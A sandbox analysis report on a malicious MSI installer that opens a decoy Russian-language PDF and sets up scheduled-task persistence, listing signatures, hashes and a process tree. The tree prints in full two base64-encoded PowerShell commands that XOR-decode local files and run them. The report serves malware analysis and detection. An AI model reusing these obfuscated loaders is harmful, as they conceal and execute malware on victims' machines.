Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
12/04/2023, 05:09
General
-
Target
fee3db5db8817e82b1af4cedafd2f346.msi
-
Size
166KB
-
MD5
fee3db5db8817e82b1af4cedafd2f346
-
SHA1
e6bcf68c7d55fc933e7a7e2ca1fb4e8fa1ad376d
-
SHA256
4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51
-
SHA512
37bbe3176b6d793b2b140e6bb6989b322832bdd77869d86e071e7566902fa9f718a647c2fb347a8a79f1fd9b5d5fc376ba8ddfa516944c3134d351048853278c
-
SSDEEP
3072:cCZXtgABNBJ1BP5mUopW5KfTl6bmneDhZd31JHtb/B9:cedgABj3op+KrcrtZd31Ftb/B9
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 43 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 40 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fee3db5db8817e82b1af4cedafd2f346.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32ADEE031874A1F3C0866EDB96DEA3862⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABpAG4AcwB0AD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAFcAaQBuAEUAdgBlAG4AdABDAG8AbQBcAHMAZQByAHYAaQBjAGUAXwBwAGEAYwBrAC4AZABhAHQAIgA7AGkAZgAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAaQBuAHMAdAApACkAewByAGUAdAB1AHIAbgA7AH0AJABiAGkAbgBzAHQAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAEIAeQB0AGUAcwAoACQAaQBuAHMAdAApADsAJAB4AGIAaQBuAHMAdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABCAHkAdABlAFsAXQAgACQAYgBpAG4AcwB0AC4AQwBvAHUAbgB0ADsAZgBvAHIAKAAkAGkAPQAwADsAJABpAC0AbAB0ACQAYgBpAG4AcwB0AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AGIAaQBuAHMAdABbACQAaQBdAD0AJABiAGkAbgBzAHQAWwAkAGkAXQAtAGIAeABvAHIAMAB4ADEAMwA7ACQAeABiAGkAbgBzAHQAWwAkAGkAXQA9ACQAYgBpAG4AcwB0AFsAJABpAF0ALQBiAHgAbwByADAAeAA1ADUAOwAkAHgAYgBpAG4AcwB0AFsAJABpAF0APQAkAGIAaQBuAHMAdABbACQAaQBdAC0AYgB4AG8AcgAwAHgARgBGADsAJAB4AGIAaQBuAHMAdABbACQAaQBdAD0AJABiAGkAbgBzAHQAWwAkAGkAXQAtAGIAeABvAHIAMAB4AEYARgA7AH0AOwBUAHIAeQB7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4AGIAaQBuAHMAdAApAHwAaQBlAHgAOwB9AEMAYQB0AGMAaAB7AH0AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABpAG4AcwB0ACAALQBGAG8AcgBjAGUACgA=3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Приказ Минфина ДНР № 176.pdf"4⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zlczjzws.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9926.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9925.tmp"5⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /TN WindowsActiveXTaskTrigger4⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /RUN /TN WindowsActiveXTaskTrigger4⤵
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D4" "00000000000004A0"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {BB9F1359-3F92-49F0-A62A-2CF7967F30C4} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\WinEventCom\manutil.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABtAGEAaQBuAD0AIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABXAGkAbgBFAHYAZQBuAHQAQwBvAG0AXABjAG8AbgBmAGkAZwAiADsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABtAGEAaQBuACkAKQB7AHIAZQB0AHUAcgBuADsAfQAkAGIAYQByAHIAYQB5AD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAG0AYQBpAG4AKQA7ACQAeABhAHIAcgBhAHkAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGIAYQByAHIAYQB5AC4AQwBvAHUAbgB0ADsAZgBvAHIAKAAkAGkAPQAwADsAJABpAC0AbAB0ACQAYgBhAHIAcgBhAHkALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeABBAEIAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeABGAEYAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeAAzADAAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeAAxADAAOwB9ADsAVAByAHkAewBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeABhAHIAcgBhAHkAKQB8AGkAZQB4ADsAfQBDAGEAdABjAGgAewB9AA==3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z1lduoro.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES536F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC536E.tmp"5⤵
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5524d32c5111adad2af296bb84ed93075
SHA1536694efa08cf26bda73d28ec1bcc07a841f4061
SHA2569387e46ee84316fc7dd0c6a28e56f7a135a62428e47e3b845a808eb999ea943c
SHA512e13469a51839363bd61d9035210ce82397950b7f396fc05ca8b465e47881d45ca166a0e8de02147e3a866bd3b7723744872a95f4975c6bc899b703cc652e907e
-
Filesize
1KB
MD50ae2740214911409e698df5732eb9b2e
SHA1ef155653b801644aaa1d4b211074dafc56fe95f0
SHA2567a0c2086e522c0e3b495f95c022f119404cef25dc1b9cfb3da3054b6ff9bb784
SHA512279a20a3d6d43cb91426a63e08a9985919250ec989c6acce84f467a69a358837aad2f0f2432418b24d56b8cfac5ebef98779320eed9a2fdf16f9c4c472e7ce2d
-
Filesize
3KB
MD573b10d18776d0a4f69ad9fb2fee6c087
SHA1e93ec1dd91174e8285a1e5d5ec7c6adb4acdc6e2
SHA2564f8626202f4a9a22b49ec92b4bcf790a4a81de12bcb9e162f7c9433e19f16cd7
SHA5127272fd19b57b426b0db4bd2e5f54564ad875c87d4fab32d8b2eb8a63b4e9e2f7993dc5c27e98520d73e4e766a3c38a543a45891dd14d8f10e3ceedf84519c78c
-
Filesize
7KB
MD53db7fc9f44e1bf2daa51f1f2b750dfb9
SHA17374b31f44d4dd2e54fe5e37c3191616695d9c44
SHA2561a6c4f8e4b426468dcd509eccb97b839cf618ba676431c242b7784cf57546d97
SHA5122ca559744d8232b179277ba989e7a55b89d17a86609134c6a04632b9b3bf57797b0e7bc3fc9abcd4c5c1259f3d6e869cbdbceac3b312fa46e192e79a1b691d49
-
Filesize
9KB
MD5ab4d7aae358846880050ea7e37f52ac7
SHA16c0f5abb5531cd47313b21e461b190f6a39676a0
SHA256ddf9f9cf92aa2cd47cd9aa708756e2233fbb0186480377ed6c37bdb66e0d1ec3
SHA5120a0bfae046028f5439b9c30cb32596da585f3d84fb38959b66510f999ae3d51330be7357c7b23ddd7a19882ab568e21459a99805f59a2ac5db31a6dd5f4e6dfb
-
Filesize
1KB
MD58c2f5e7432f1e6ad22002991772d589b
SHA18b04e7b1608b7498e06905e62f03f5e23687d9eb
SHA2565d008539c11d9e35e9851487e82a078bbf8a1bd19a7f5f1f5beb581b47c7ca91
SHA5127c7eac0081ff7ce07ba96cd11f36f04e3386f2a176b4357c53384b72b7fcd0deacc477a20b5264b8b39f47d9348a5a8069a8acfff5b2e8576629b933d66e6bc1
-
Filesize
111KB
MD579da5a4719f51837126bebd6c8f2714f
SHA136fbda3057119305f946a5f2949d442b33a3261c
SHA25637309f7ea1877775b1d33e4d8fd43f5bbd49758af2c0400785d860c8036a0598
SHA51201b6dcc10cf888084f4267b4bcc34e0b3b62ce50e09f903244757a819af83997b2fab9be755c464c89235f60f8c8383c272519950165dcad22f844266044935a
-
Filesize
7KB
MD5f7894f09d1a400c8c805fe9a0176868b
SHA19495209a08e77c5f424a0d0b219bd3e5809aa9b7
SHA2561af7e457c30871c50025e537c1fff0f46675a394dcd3b9ccefdbf5d84b5eeb3a
SHA5125f631b71ffe169688ea2717f3199cd6c4e49b213ebbd012d84562d826d4b7121fdf4e6d872ddd76ee188657a6b3219b4663fe06def5e6e7cc8fc41ae9d084c06
-
Filesize
23KB
MD5e1f0082cb3d04c4a2a70ae02a158520c
SHA133a7244d072cf1d530a26d7d77bfe88615661ecd
SHA256f405a26904d2f6aaf4ff5f24dc345a24751d13b691a0bf17ba8c94f08ebb8b5b
SHA5122cf6bb9ba1c443797328159004c2f63ef70363e72fc3fe9aaee4a73a2d95f73a56cc30b2597d8d643370babaeaac46b24dbe59237a3ab866b61f0cb7eac8f0ca
-
Filesize
111KB
MD579da5a4719f51837126bebd6c8f2714f
SHA136fbda3057119305f946a5f2949d442b33a3261c
SHA25637309f7ea1877775b1d33e4d8fd43f5bbd49758af2c0400785d860c8036a0598
SHA51201b6dcc10cf888084f4267b4bcc34e0b3b62ce50e09f903244757a819af83997b2fab9be755c464c89235f60f8c8383c272519950165dcad22f844266044935a
-
Filesize
166KB
MD5fee3db5db8817e82b1af4cedafd2f346
SHA1e6bcf68c7d55fc933e7a7e2ca1fb4e8fa1ad376d
SHA2564808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51
SHA51237bbe3176b6d793b2b140e6bb6989b322832bdd77869d86e071e7566902fa9f718a647c2fb347a8a79f1fd9b5d5fc376ba8ddfa516944c3134d351048853278c
-
Filesize
652B
MD566feafbeb5ab5151628b1148ebdea138
SHA17a788eb7039175e2624e167456f1672ed65ef9fa
SHA2562f1998ebce77902f9808393b590e496c79c784aa53bbad495e15cd53fa2a9a53
SHA5120025b90c9d5b56243403bcc5c29354a029dbcc36000440bc2450120daeb882dd5b074f00faa77ccd7fa3829c873aec647664bf086a61ec3edf8e1cc8b27d702f
-
Filesize
363B
MD51c84f1b08df842fa8b588b11f9221c94
SHA17dff1d05dfd1baa79823326f8b88598dd5cf5b6c
SHA256c4e2044972dd7206a6561117d972945f2d4330072d4c7feea861c785576f9d16
SHA5124b89ca9d512b1c713d6a8cb0fbb057e46493766452a850734f990bebabb00c78a12749e1dda6aa8ee4f00a0c35b7af93ae627c4e1b68b0eaca47e6b37b4bb502
-
Filesize
309B
MD5339ca1abf9c9200d6d926248917baa1a
SHA1bb86bb0b03f06c4ed465c84d53342ee260af955f
SHA2565ffede7e0bf5a9fa6218778fb64fb73cf751c4e0b469d49018019f865acc8f6e
SHA512042d0ebbe414db54bfe75cdfb61bacc0e0eed2dc41039ba70977949497c8696923733507c086a783740d0cc638f2752a3fdc9276f477c04df10ef2ab47ff35fe
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
32KB